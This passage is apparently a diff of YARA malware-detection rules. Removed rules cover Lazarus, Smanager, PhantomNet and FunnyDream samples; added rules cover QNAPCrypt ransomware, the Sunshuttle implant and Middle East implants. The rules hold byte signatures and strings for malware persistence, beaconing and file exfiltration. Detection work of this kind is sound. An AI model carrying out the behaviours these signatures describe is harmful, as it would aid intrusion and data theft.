+		$s1 = { 25 50 44 46 2d 31 2e 33 0a 25 06 8b c4 1c c5 86 66 f3 dc 75 f9 3b dd 8c 44 e3 d3 a4 74 9d 94 4e 2e 0f d9 01 a6 f2 88 6a a8 0b 16 1b 1a fc 60 3f 72 7a 1b c1 a7 bb 2f 19 31 6d 6f 79 db 20 f6 c7 fa e7 eb b9 88 77 de 1f a1 92 d7 ea 68 a9 b7 89 17 92 e8 b2 bb a5 58 56 b4 30 60 f8 28 0c 54 7b 2b 68 ba 7e 01 01 6d ad 2e 6d 72 67 1e b0 a8 ea 42 82 bd 14 9a 86 f0 0d 9a 8b 92 76 b3 b3 7d ef 69 24 2c 9f c2 ca e9 c9 b3 }
+		$s2 = { 25 25 45 4f 46 0a }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 80KB and 11 of them
+		filesize > 50KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Generic_June_2020_1 : FILE
+rule ARKBIRD_SOLG_RAN_ELF_Qnapcrypt_Aug_2021_2 : FILE
 {
 	meta:
-		description = "Detect stealers used by Lazarus APT by common strings"
-		author = "Arkbird_SOLG, James_inthe_box"
-		id = "11a7c531-91a4-524e-aa5d-c11538f7db58"
-		date = "2020-06-23"
-		modified = "2021-07-13"
-		reference = "https://twitter.com/GR_CTI/status/1275164880992186371"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L60-L85"
+		description = "Detect QNAPCrypt ransomware (x64 version)"
+		author = "Arkbird_SOLG"
+		id = "8cd54646-87da-5261-82f3-68ab96549379"
+		date = "2021-08-11"
+		modified = "2021-08-12"
+		reference = "https://bazaar.abuse.ch/browse/tag/QNAPCrypt/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-11/QNAPCrypt/RAN_ELF_QNAPCrypt_Aug_2021_2.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "878e4a128b7de45f4940e7adccfeb376ce46e87b35b25e162f668303e9fd7852"
+		logic_hash = "9eb3a499afbaaf2addb8ee12cc2d479ebbacd4d19cc270e995f12e83546008b4"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		hash1 = "6d461bf3e3ca68b2d6d850322b79d5e3e647b0d515cb10449935bf6d77d7d5f2"
-		hash2 = "6caa98870efd1097ee13ae9c21c6f6c9202a19ad049a9e65c60fce5c889dc4c8"
+		hash1 = "4829041c64971a0cb37d55e6ba83a57e01e76b26f3f744814b59bedbb3fefce8"
+		hash2 = "50470f94e7d65b50bf00d7416a9634d9e4141c5109a78f5769e4204906ab5f0b"
+		hash3 = "f9f5265f4c748ce0e2171915fb8edb6d967539ac46d624db8eb2586854dd0d9e"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease" fullword ascii
-		$s2 = "Mutex failure! %d" fullword ascii
-		$s3 = "Win32_DllRelease.dll" fullword ascii
-		$s4 = "Mutex already created! %s\n" fullword ascii
-		$s5 = "[END]" fullword ascii
-		$s6 = "Thread finished!" fullword ascii
-		$s7 = "Thread started!" fullword ascii
-		$s8 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii
-		$s9 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii
-		$s10 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii
-		$s11 = "Thread terminated!" fullword ascii
-		$s12 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 }
-		$s13 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 }
-		$s14 = "Entered Windows direcotry, skipping..." fullword ascii
+		$s1 = { 52 45 41 44 4d 45 5f 46 4f 52 5f 44 45 43 52 59 50 54 }
+		$s2 = { 64 48 8b 0c 25 f8 ff ff ff 48 8d 44 24 ?? 48 3b 41 10 0f 86 [2] 00 00 48 81 ec ?? 00 00 00 48 89 ac 24 ?? 00 00 00 48 8d ac 24 ?? 00 00 00 48 8b 05 [3] 00 48 83 3d [3] 00 00 0f 86 [2] 00 00 48 8b 48 08 48 8b 00 48 89 04 24 48 89 4c 24 08 e8 [3] ff 48 c7 04 24 20 00 00 00 e8 [2] 00 00 48 c7 04 24 00 00 00 00 e8 [3] ff 48 8b 44 24 20 48 89 44 24 58 48 8b 4c 24 18 48 89 8c 24 88 00 00 00 48 8b 54 24 28 48 89 54 24 60 48 }
+		$s3 = { 48 81 ec ?? 00 00 00 48 89 ac 24 ?? 00 00 00 48 8d ac 24 ?? 00 00 00 }
+		$s4 = { 64 48 8b 0c 25 f8 ff ff ff 48 [0-5] 3b ?? 10 0f 86 [2] 00 00 48 ?? ec }
+		$s5 = { 48 83 ec 78 48 89 6c 24 70 48 8d 6c 24 70 48 8b 05 [3] 00 48 8b 0d [3] 00 48 8b 15 [3] 00 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 e8 [3] ff 48 8b 44 24 18 48 85 c0 0f 84 10 01 00 00 48 8b 48 28 48 8b 50 20 48 8b 40 18 48 89 04 24 48 89 54 24 08 48 89 4c 24 10 e8 [3] ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 8b 5c 24 30 48 85 d2 0f 85 a3 00 00 00 48 8d 15 [2] 03 00 48 39 d0 0f 85 13 01 00 00 48 8b 05 [3] 00 48 8b 15 [3] 00 48 89 04 24 48 89 54 24 08 48 89 4c 24 10 48 8b 84 24 80 00 00 00 48 89 44 24 18 48 8b 84 24 88 00 00 00 48 89 44 24 20 48 8b 84 24 90 00 00 00 48 89 44 24 28 e8 [3] ff 48 8b 44 24 38 48 8b 4c 24 40 48 8b 54 24 48 48 8b 5c 24 50 48 8b 74 24 30 48 89 b4 24 98 00 00 00 48 89 84 24 a0 00 00 00 48 89 8c 24 a8 00 00 00 48 89 94 24 b0 00 00 00 48 89 9c 24 b8 00 00 00 48 8b 6c 24 }
+		$s6 = { 48 81 ec 48 01 00 00 48 89 ac 24 40 01 00 00 48 8d ac 24 40 01 00 00 48 8d 7c 24 38 48 8d 35 [2] 0f 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 [3] ff 48 8b 6d 00 48 8d 05 [2] 02 00 48 89 04 24 48 8b 84 24 50 01 00 00 48 89 44 24 08 48 89 44 24 10 e8 [3] ff 48 8b 44 24 18 48 89 84 24 38 01 00 00 31 c9 eb 18 8b 54 84 38 48 8b 5c 24 30 48 8b 84 24 38 01 00 00 89 14 98 48 8d 4b 01 48 8b 94 24 50 01 00 00 48 39 d1 7d 2c 48 89 4c 24 30 90 48 8b 05 [3] 00 48 89 04 24 48 c7 44 24 08 40 00 00 00 e8 [3] ff 48 8b 44 24 10 48 83 f8 40 72 b1 eb 46 48 c7 04 24 00 00 00 00 48 89 44 24 08 48 89 54 24 10 48 89 54 24 18 e8 [3] ff 48 8b 44 24 28 48 8b 4c 24 20 48 89 8c 24 58 01 00 00 48 89 84 24 60 01 00 00 48 8b ac 24 40 01 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 80KB and 11 of them
+		uint32( 0 ) == 0x464C457F and filesize > 25KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_Mal_Smanager_Installer_Module_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_RAN_ELF_Qnapcrypt_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect installer module of Smanager (November 2020)"
+		description = "Detect QNAPCrypt ransomware (x86 version)"
 		author = "Arkbird_SOLG"
-		id = "364285bc-2173-5ff0-85d2-af06051a3b70"
-		date = "2020-12-19"
-		modified = "2020-12-19"
-		reference = "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-19/Mal_Smanager_Installer_Module_Nov_2020_1.yar#L1-L24"
+		id = "fcdec43a-de70-57a2-9527-263685acc820"
+		date = "2021-08-11"
+		modified = "2021-08-12"
+		reference = "https://bazaar.abuse.ch/browse/tag/QNAPCrypt/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-11/QNAPCrypt/RAN_ELF_QNAPCrypt_Aug_2021_1.yara#L1-L29"
 		license_url = "N/A"
-		logic_hash = "380d28f6cdea24f807f3c29207eb0b8888ebdfea215c53df164fe080c3917438"
+		logic_hash = "4dbe5241b9f1b68a15193f3d5c7b0b5fac80208c16917b6e543ce407301f1dcf"
 		score = 75
-		quality = 61
+		quality = 71
 		tags = "FILE"
-		hash1 = "97a5fe1d2174e9d34cee8c1d6751bf01f99d8f40b1ae0bce205b8f2f0483225c"
+		hash1 = "551e03e17d1df9bd5b712bec7763578c01e7bffe9b93db246e36ec0a174f7467"
+		hash2 = "670250a169ba548c07a5066a70087e83bbc7fd468ef46199d76f97f9e7f72f36"
+		hash3 = "6df0897d4eb0826c47850968708143ecb9b58a0f3453caa615c0f62396ef816b"
+		hash4 = "fedcce505a5e307c1d116d52b3122f6484b3d25fb3c4d666fe7af087cfe85349"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$s1 = { 63 6d 64 20 2f 63 20 73 63 68 74 61 73 6b 73 20 2f 46 20 2f 63 72 65 61 74 65 20 2f 74 6e 3a 57 69 6e 64 6f 77 73 5c 55 70 64 61 74 65 20 2f 74 72 20 22 25 73 22 20 20 20 2f 73 63 20 48 4f 55 52 4c 59 }
-		$s2 = { 25 73 5c 73 79 73 74 65 6d 33 32 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b 20 25 73 }
-		$s3 = { 25 73 79 73 74 65 6d 72 6f 6f 74 25 }
-		$s4 = { 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c [1-8] 5c [1-8] 2e 63 61 62 }
-		$s5 = { 53 6d 61 6e 61 67 65 72 5f 73 73 6c 2e 64 6c 6c }
-		$s6 = { 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 20 4e 54 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 53 76 63 68 6f 73 74 }
-		$s7 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 53 65 72 76 69 63 65 73 5c }
-		$s8 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 61 70 70 70 61 74 63 68 5c }
-		$s9 = "TmV0QmlvcyBNZXNzYWdlciBSZWdpc3Rlcg==" fullword ascii
-		$s10 = { 68 74 74 70 73 3d 25 5b 5e 3a 5d 3a 25 64 00 00 68 74 74 70 73 3d 00 00 73 6f 63 6b 73 3d 25 5b 5e 3a 5d 3a 25 64 00 00 73 6f 63 6b 73 3d 00 00 68 74 74 70 3d 25 5b 5e 3a 5d 3a 25 64 00 00 00 68 74 74 70 3d }
-		$s11 = "&About VVSup..." fullword wide
-		$s12 = "%d.tmp" fullword ascii
+		$s1 = { 2d 00 20 00 20 00 00 00 80 00 80 08 00 00 00 00 00 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 25 00 05 }
+		$s2 = { 2d 2d 2d 2d 2d 45 4e 44 20 00 00 00 00 00 00 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 }
+		$s3 = { 52 65 71 75 69 72 65 64 55 73 65 72 2d 41 67 65 6e 74 3a 20 25 73 0d 0a 57 77 77 2d 41 75 74 68 65 6e 74 69 63 61 74 65 5a 61 6e 61 62 61 7a 61 72 5f 53 71 75 61 72 65 0a 72 75 6e 74 69 6d 65 20 73 74 61 63 6b 3a }
+		$s4 = { 34 10 90 e5 80 20 9f e5 04 20 8d e5 08 10 8d e5 c8 10 9f e5 0c 10 8d e5 0a 30 a0 e3 10 30 8d e5 53 4e f8 eb 14 00 9d e5 00 10 90 e5 04 00 90 e5 00 00 50 e3 0c 00 00 da 04 00 91 e5 00 10 91 e5 04 10 8d e5 08 00 8d e5 94 00 9f e5 0c 00 8d e5 05 00 a0 e3 10 00 8d e5 15 e2 ff eb 14 00 dd e5 01 10 20 e2 84 00 9d e5 09 fe ff ea 00 00 a0 e3 00 10 a0 e3 f1 ff ff ea 0e 30 a0 e1 56 76 f9 eb fa }
+		$s5 = { 89 7c 24 2c 83 fe 20 19 db 89 f1 bf 01 00 00 00 d3 e7 21 df 89 fb 83 c7 ff 89 7c 24 24 83 c1 e0 89 4c 24 3c 83 f9 20 19 f6 f7 d9 89 4c 24 38 83 f9 20 19 ff 8b 4c 24 3c ba 01 00 00 00 d3 e2 21 f2 8b 4c 24 38 be 01 00 00 00 d3 ee 21 fe 09 d6 83 c3 ff 83 d6 ff 89 74 24 34 8b 54 24 44 8b 5c 24 2c 8b 7c 24 40 8b 4c 24 28 89 44 24 48 31 c0 89 44 24 30 31 c0 89 44 24 20 31 c0 89 44 24 1c }
+		$s6 = { 65 8b 0d 00 00 00 00 8b 89 fc ff ff ff 3b 61 08 0f 86 44 03 00 00 83 ec 58 c7 44 24 20 00 00 00 00 c7 44 24 24 00 00 00 00 8d 05 60 c3 27 08 89 44 24 20 8d 0d 28 af 31 08 89 4c 24 24 8b 0d 4c 35 4c 08 8d 15 50 e8 31 08 89 14 24 89 4c 24 04 8d 4c 24 20 89 4c 24 08 c7 44 24 0c 01 00 00 00 c7 44 24 10 01 00 00 00 e8 63 b9 ea ff 90 c7 05 94 38 4c 08 06 00 00 00 8b 05 d0 50 4d 08 85 c0 0f 85 b3 02 00 00 8d 05 1a d3 2b 08 89 05 90 38 4c 08 8b 05 a4 34 4c 08 89 04 24 8d 05 10 02 32 08 89 44 24 04 8d 05 90 38 4c 08 89 44 24 08 }
+		$x1 = { e8 [2] e4 ff 8b 44 24 08 89 44 24 28 8b 4c 24 0c 89 4c 24 2c 31 d2 31 db eb 18 8b 6c 24 40 83 c5 01 8b 54 24 44 83 d2 00 8b 44 24 28 8b 4c 24 2c 89 eb 39 ca 87 dd 0f ?? c3 87 dd }
+		$x2 = { 8b ?? 20 89 ?? 24 ff d0 8b 44 24 ?? 89 44 24 ?? 8b 4c 24 ?? 89 4c 24 ?? c7 44 24 68 65 43 68 30 c7 44 24 6c 72 61 69 78 89 ?? 24 89 ?? 24 04 e8 [2] e4 ff }
+		$x3 = { 74 11 90 e5 70 21 90 e5 68 31 90 e5 6c 41 90 e5 04 30 8d e5 08 40 8d e5 0c 20 8d e5 10 10 8d e5 91 5c fe eb 1c 00 9d e5 18 10 9d e5 14 30 9d e5 78 20 9d e5 40 10 82 e5 44 00 82 e5 ac b6 9f e5 00 00 9b e5 00 00 50 e3 27 06 00 1a 3c 30 82 e5 7c 02 9d e5 20 10 80 e2 1b 2e 8d e2 f9 0d fc eb 04 20 8d e2 1b 1e 8d e2 f6 0d fc eb 9e f4 ff eb 34 00 9d e5 78 30 9d e5 48 00 83 e5 7c 02 9d e5 d4 40 90 e5 d0 50 90 e5 cc 60 90 e5 04 60 8d e5 08 50 8d e5 0c 40 8d e5 fe f5 ff eb 10 00 9d e5 78 30 9d e5 4c 00 83 e5 04 00 8d e5 7c 02 9d e5 c0 40 80 e2 08 40 8d e5 8c fa ff eb 0c 00 9d e5 18 30 9d e5 10 40 9d e5 14 50 9d e5 78 60 9d e5 50 00 86 e5 14 b6 9f e5 00 00 9b e5 00 }
+		$x4 = { d0 00 8d e5 05 00 53 e3 a0 05 00 1a 00 30 d2 e5 68 00 53 e3 9a 05 00 1a 01 30 d2 e5 74 00 53 e3 94 05 00 1a 02 30 d2 e5 74 00 53 e3 8e 05 00 1a 03 30 d2 e5 70 00 53 e3 88 05 00 1a 04 20 d2 e5 73 00 52 e3 82 05 00 1a 9c 22 9d e5 54 30 92 e5 00 00 53 e3 72 04 00 0a 00 00 51 e3 6a 04 00 1a b4 12 9d e5 b8 32 9d e5 54 70 92 e5 58 07 9f e5 }
+		$x5 = { 55 6e 61 62 6c 65 20 74 6f 20 63 72 65 61 74 65 20 70 69 64 20 66 69 6c 65 20 3a 20 25 76 }
+		$x6 = { 53 61 76 65 20 63 75 72 72 20 50 49 44 20 25 64 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 90KB and 7 of them
+		uint32( 0 ) == 0x464C457F and filesize > 25KB and 3 of ( $s* ) and 2 of ( $x* )
 }
-rule ARKBIRD_SOLG_Mal_Phantomnet_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_UNC2452_Sunshuttle_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect PhantomNet (November 2020)"
+		description = "Detect Sunshuttle implant used by UNC2452 group"
 		author = "Arkbird_SOLG"
-		id = "16ddcc9a-8254-5d40-adcd-70ebe212fc78"
-		date = "2020-12-19"
-		modified = "2020-12-19"
-		reference = "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-19/Mal_PhantomNet_Nov_2020_1.yar#L1-L24"
+		id = "faa07d19-4c61-554d-a6b1-ab7cb0919ec0"
+		date = "2021-03-06"
+		modified = "2021-03-06"
+		reference = "https://twitter.com/Arkbird_SOLG/status/1367570764468224010"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-06/UNC2452/APT_UNC2452_sunshuttle_Mar_2021_1.yar#L1-L31"
 		license_url = "N/A"
-		logic_hash = "a08467f68968fb0dfa82bca5984e1ad823f222946bd0acb62db418556a9a347a"
+		logic_hash = "368487f1716aaa5c10e19a428649d6706b3f45c53853e6729752dc41fc97bc38"
 		score = 75
-		quality = 65
+		quality = 63
 		tags = "FILE"
-		hash1 = "ea7b2def3335b81048aac8fc372349f38453b676fa833603b7e15c45437f6858"
-		hash2 = "338502691f6861ae54e651a25a08e62eeca9febc6830978a670d44caf3d5d056"
+		hash1 = "611458206837560511cb007ab5eeb57047025c2edc0643184561a6bf451e8c2c"
+		hash2 = "b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8"
+		hash3 = "bbd16685917b9b35c7480d5711193c1cd0e4e7ccb0f2bf1fd584c0aebca5ae4c"
 
 	strings:
-		$s1 = { 25 73 25 30 38 58 }
-		$s2 = { 68 00 74 00 74 00 70 00 5c 00 73 00 68 00 65 00 6c 00 6c 00 5c 00 6f 00 70 00 65 00 6e 00 5c 00 63 00 6f 00 6d 00 6d 00 61 00 6e 00 64 }
-		$s3 = { 6b 25 34 64 2d 25 30 32 64 2d 25 30 32 64 }
-		$s4 = { 47 6c 6f 62 61 6c 5c 47 6c 6f 62 61 6c 41 63 70 72 6f 74 65 63 74 4d 75 74 65 78 }
-		$s5 = "Proxy-Authorization: NTLM" fullword ascii
-		$s6 = { 50 72 6f 78 79 2d 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a }
-		$s7 = { 48 54 54 50 2f 31 2e 31 20 00 00 00 48 54 54 50 2f 31 2e 30 20 }
-		$s8 = { 52 00 6f 00 6f 00 74 00 5c 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 43 00 65 00 6e 00 74 00 65 00 72 00 32 00 00 00 00 00 53 45 4c 45 43 54 20 2a 20 46 52 4f 4d 20 41 6e 74 69 56 69 72 75 73 50 72 6f 64 75 63 74 00 00 57 51 4c }
-		$s9 = { 68 74 74 70 00 00 00 00 25 5b 5e 3a 5d 00 00 00 25 2a 5b 5e 3a 5d 3a 25 64 }
-		$s10 = { 48 6f 73 74 3a 20 }
-		$s11 = { 43 6f 6f 6b 69 65 73 3a 20 }
-		$s12 = "Proxy-Authenticate: NTLM" fullword ascii
+		$s1 = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 39 59 72 42 6a 6b 6b 58 46 79 6b 62 47 51 72 6d 56 32 4b 49 2f 41 48 44 69 7a 57 51 61 4d 38 47 38 4a 37 6b 56 4b 32 56 65 2f 46 55 74 5f 6b 6b 53 56 6c 78 32 36 49 6e 46 56 61 79 70 77 2f 6c 75 5a 41 54 35 55 6e 55 69 34 64 4a 65 6b 6e 73 6b 55 6e 22 }
+		$s2 = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 71 6f 66 49 6b 76 62 6c 73 31 69 72 4f 36 78 68 6a 41 63 5a 2f 6a 49 69 71 41 70 70 31 56 6f 39 72 4f 53 2d 44 6a 65 4e 75 2f 62 50 75 6e 33 4e 35 74 49 42 58 4b 50 74 4e 79 73 48 4f 51 2f 41 52 53 72 63 65 6b 35 68 51 47 38 59 49 56 6e 4d 75 37 54 22 }
+		$s3 = { 6f 73 2f 65 78 65 63 2e 28 2a 43 6d 64 29 2e 52 75 6e }
+		$s4 = "main.request_session_key" fullword ascii
+		$s5 = "main.wget_file" fullword ascii
+		$s6 = "main.GetMD5Hash" fullword ascii
+		$s7 = "main.beaconing" fullword ascii
+		$s8 = "main.resolve_command" fullword ascii
+		$s9 = "main.send_file_part" fullword ascii
+		$s10 = "main.retrieve_session_key" fullword ascii
+		$s11 = "main.send_command_result" fullword ascii
+		$s12 = { 63 38 3a 32 37 3a 63 63 3a 63 32 3a 33 37 3a 35 61 }
+		$s13 = { 2d 2d 2d 2d 2d 42 45 47 49 4e }
+		$s14 = { 2d 2d 2d 2d 2d 45 4e 44 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 90KB and 9 of them
+		uint16( 0 ) == 0x5a4d and filesize > 800KB and 12 of them
 }
-rule ARKBIRD_SOLG_Mal_Funnydream_Backdoor_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_Unknown_Middle_East_Feb_2020_1 : FILE
 {
 	meta:
-		description = "Detect backdoor used by FunnyDream (November 2020)"
+		description = "Dectect unknown Middle East implants (retrohunt June 2020)"
 		author = "Arkbird_SOLG"
-		id = "48120ba2-adaa-5098-8d8c-5c32bbafb9f6"
-		date = "2020-12-19"
-		modified = "2020-12-19"
-		reference = "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-19/Mal_FunnyDream_Backdoor_Nov_2020_1.yar#L1-L22"
+		id = "e45675e6-29d5-587b-943e-19450772a092"
+		date = "2021-03-05"
+		modified = "2021-03-06"
+		reference = "internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-06/Unknown/APT_Unknown_Middle_East_Feb_2020_1.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "d12c465c735f09295b382fd5679d411c5114c232dabc22be84151e436f8fa199"
+		logic_hash = "64cdac73bc3e29e8716cb24ae6577f853b2cf31303d129a0ec38ba89b7ff5351"
 		score = 75
-		quality = 67
+		quality = 75
 		tags = "FILE"
-		hash1 = "ce5c8741bffa8de5093d1831d736a7e478a54baa3676da37cde24f38d10f3529"
+		hash1 = "274beb57ae19cbc5c2027e08cb2b718dea7ed1acb21bd329d5aba33231fb699d"
+		hash2 = "3a4ef9b7bd7f61c75501262e8b9e31f9e9bc3a841d5de33dcdeb8aaa65e95f76"
 
 	strings:
-		$s1 = { 25 64 25 64 25 64 20 25 64 3a 25 64 }
-		$s2 = { 73 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 49 6e 74 65 72 6e 65 74 20 53 65 74 74 69 6e 67 73 00 00 50 72 6f 78 79 45 6e 61 62 6c 65 00 50 72 6f 78 79 53 65 72 76 65 }
-		$s3 = { 48 41 52 44 57 41 52 45 5c 44 45 53 43 52 49 50 54 49 4f 4e 5c 53 79 73 74 65 6d 5c 43 65 6e 74 72 61 6c 50 72 6f 63 65 73 73 6f 72 5c 30 }
-		$s4 = { 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 75 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 25 75 25 73 25 73 0d 0a 53 65 72 76 65 72 3a 20 53 69 6d 70 6c 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 }
-		$s5 = { 43 4f 4e 4e 45 43 54 20 25 73 3a 25 64 20 48 54 54 50 2f 31 2e 30 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 31 30 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 31 3b 29 0d 0a 50 72 6f 78 79 2d 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 25 73 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 0d 0a }
-		$s6 = { 31 32 33 34 35 36 00 00 55 73 65 72 2d 30 30 31 }
-		$s7 = { 25 73 20 25 73 25 73 2f 25 73 2f 25 30 38 58 25 30 38 58 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 30 38 58 25 30 38 78 }
-		$s8 = { 63 6c 74 2e 65 78 65 00 44 6c 6c 49 6e 73 74 61 6c 6c 00 53 74 61 72 74 }
-		$s9 = { 32 30 30 20 43 6f 6e 6e 65 63 74 69 6f 6e 20 65 73 74 61 62 6c 69 73 68 65 64 }
-		$s10 = { 5c 63 6d 64 c7 85 e0 fe ff ff 2e 65 78 65 }
+		$seq1 = { 55 8b ec 83 e4 f8 81 ec 08 04 00 00 a1 34 45 49 00 33 c4 89 84 24 04 04 00 00 83 ec 08 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 af 9f ff ff 83 c4 04 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 98 9f ff ff 83 c4 04 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 81 9f ff ff 83 c4 0c 8d 04 24 68 00 04 00 00 6a 00 50 e8 [2] 01 00 83 c4 0c 8d 04 24 [4] 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? ab 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 6c 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? a9 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 83 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 33 c0 66 89 84 24 fe 03 00 00 8d 04 24 68 [2] 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? a6 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 83 48 00 68 00 02 00 00 50 e8 [2] 02 00 8d 4c 24 0c e8 6b a1 ff ff 83 c4 04 ba [2] 48 00 b9 ?? 83 48 00 68 [2] 48 00 e8 94 9e ff ff 8b 8c 24 10 04 00 00 83 c4 0c 33 cc e8 [2] 01 00 8b e5 5d }
+		$seq2 = { 55 8b ec 6a ff 68 [2] 47 00 64 a1 00 00 00 00 50 81 ec d8 00 00 00 a1 34 45 49 00 33 c5 89 45 f0 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 45 08 8b 75 14 c7 45 fc 00 00 00 00 89 85 34 ff ff ff 89 85 40 ff ff ff 33 c0 50 50 50 50 c7 85 3c ff ff ff 00 00 00 00 68 ?? 70 48 00 89 b5 6c ff ff ff c7 85 48 ff ff ff 00 00 00 00 c7 85 44 ff ff ff 00 00 00 00 89 85 50 ff ff ff ff 15 78 55 47 00 89 85 38 ff ff ff 85 c0 74 3f 6a 00 68 bb 01 00 00 68 ?? 6d 48 00 50 ff 15 8c 55 47 00 89 85 44 ff ff ff 85 c0 74 22 68 00 00 80 00 6a 00 6a 00 6a 00 68 ?? 71 48 00 68 ?? 6d 48 00 50 ff 15 90 55 47 00 89 85 50 ff ff ff 8b 3d 44 53 47 00 6a 00 6a 00 6a 00 6a 00 6a ff 56 6a 00 68 e9 fd 00 00 ff d7 8b f0 56 e8 ?? 35 01 00 83 c4 04 89 85 4c ff ff ff 6a 00 6a 00 56 50 6a ff ff b5 6c ff ff ff 6a 00 68 e9 fd 00 00 ff d7 68 80 00 00 00 8b f8 8d 85 70 ff ff ff 6a 00 50 e8 [2] 02 00 57 8d 85 70 ff ff ff 68 ?? 79 48 00 50 e8 ?? a3 00 00 83 c4 18 c7 85 64 ff ff ff 00 00 00 00 33 c0 c7 85 68 ff ff ff 07 00 00 00 8d 8d 54 ff ff ff 66 89 85 54 ff ff ff 6a 10 68 [2] 48 00 